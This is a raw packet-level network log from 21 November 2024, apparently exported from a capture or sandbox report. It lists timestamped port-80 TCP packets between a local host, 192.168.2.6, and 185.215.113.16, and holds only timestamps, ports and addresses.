                                                                                                                                                                      Nov 21, 2024 06:23:38.774286032 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.774349928 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.775321960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.775445938 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.775527000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.776447058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.776581049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.776618004 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.777467966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.777586937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.777662039 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.778558969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.778676987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.778747082 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.781524897 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.796761036 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.796858072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.796940088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.797298908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.797461033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.797513008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.798388004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.798513889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.798561096 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.799617052 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.799846888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.799913883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.799958944 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.800566912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.800683022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.800728083 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.801637888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.801743984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.802726984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.802774906 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.802834988 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.802874088 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.803867102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.803884029 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.803936005 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.804935932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.804948092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.804991961 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.806011915 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.806075096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.806139946 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.807115078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.807187080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.807359934 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.808187008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.808257103 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.808305025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.809242964 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.809355974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.809709072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.810323954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.810426950 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.810472012 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.811404943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.811450005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.811589956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.812489033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.812593937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.812681913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.813555002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.813682079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.813736916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.814722061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.814768076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.814913034 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.815745115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.815840006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.815891981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.816806078 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.816911936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.817121983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.817279100 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.817907095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.818027973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.818080902 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.818975925 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.819092989 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.820038080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.820075035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.820101976 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.820236921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.821171045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.821259022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.821521044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.822235107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.822371006 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.823138952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.823324919 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.823448896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.823507071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.824414968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.824495077 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.824539900 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.825474977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.825579882 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.825720072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.826564074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.826675892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.826764107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.827644110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.827752113 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.827800989 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.828712940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.828815937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.828932047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.829796076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.829910994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.829958916 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.830904961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.830997944 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.831047058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.831991911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.832112074 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.833070993 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.833116055 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.833148956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.833187103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.834152937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.834269047 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.834322929 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.835223913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.835310936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.835364103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.836318016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.836374998 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.836592913 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.837399960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.837492943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.837558031 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.838505030 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.838587999 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.838624954 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.839601994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.839612961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.839658976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.840745926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.840758085 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.840795994 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.841778040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.841852903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.841900110 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.842967987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.843040943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.843203068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.843924046 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.843957901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.844011068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.845001936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.845101118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.845150948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.846057892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.899697065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.903618097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.964941025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.965110064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.965181112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.965517044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.965591908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.965646982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.966439009 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.966547012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.967031956 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.967457056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.967567921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.967629910 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.968497992 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.968610048 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.968662024 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.969609022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.969706059 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.969783068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.970700026 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.970786095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.970889091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.988831043 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.988962889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.989012003 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.989392996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.989427090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.989567041 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.990503073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.990535975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.991446972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.991569996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.991604090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.991856098 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.992711067 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.992746115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.992790937 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.993793011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.993829012 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.993880987 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.994796038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.994860888 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.995013952 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.995879889 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.996011019 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.996067047 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.996961117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.997173071 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.997257948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.998123884 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.998192072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.998334885 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:38.999130011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.999262094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:38.999330997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.000216007 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.000328064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.000448942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.001302004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.001414061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.001606941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.002378941 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.002480984 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.002574921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.003444910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.003689051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.004211903 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.004569054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.004757881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.005588055 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.005635977 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.005753994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.005809069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.006684065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.006802082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.006860971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.007755041 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.007879972 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.007947922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.008867025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.008966923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.009331942 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.009974957 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.010044098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.010091066 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.011003017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.011200905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.011249065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.012083054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.012196064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.012352943 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.013252020 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.013264894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.013307095 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.014472961 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.014483929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.014533997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.015400887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.015414953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.015455008 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.016446114 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.016515017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.016556978 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.017537117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.017577887 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.017746925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.018735886 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.018801928 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.018845081 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.019695997 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.019831896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.020258904 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.020771980 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.020895958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.021873951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.021922112 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.022013903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.022057056 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.022931099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.023071051 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.023128033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.024027109 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.024149895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.024199009 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.025146008 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.025173903 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.025831938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.026237011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.026268005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.026325941 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.027403116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.027436018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.027607918 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.028398991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.028495073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:39.028559923 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:39.029452085 CET8049762185.215.113.16192.168.2.6
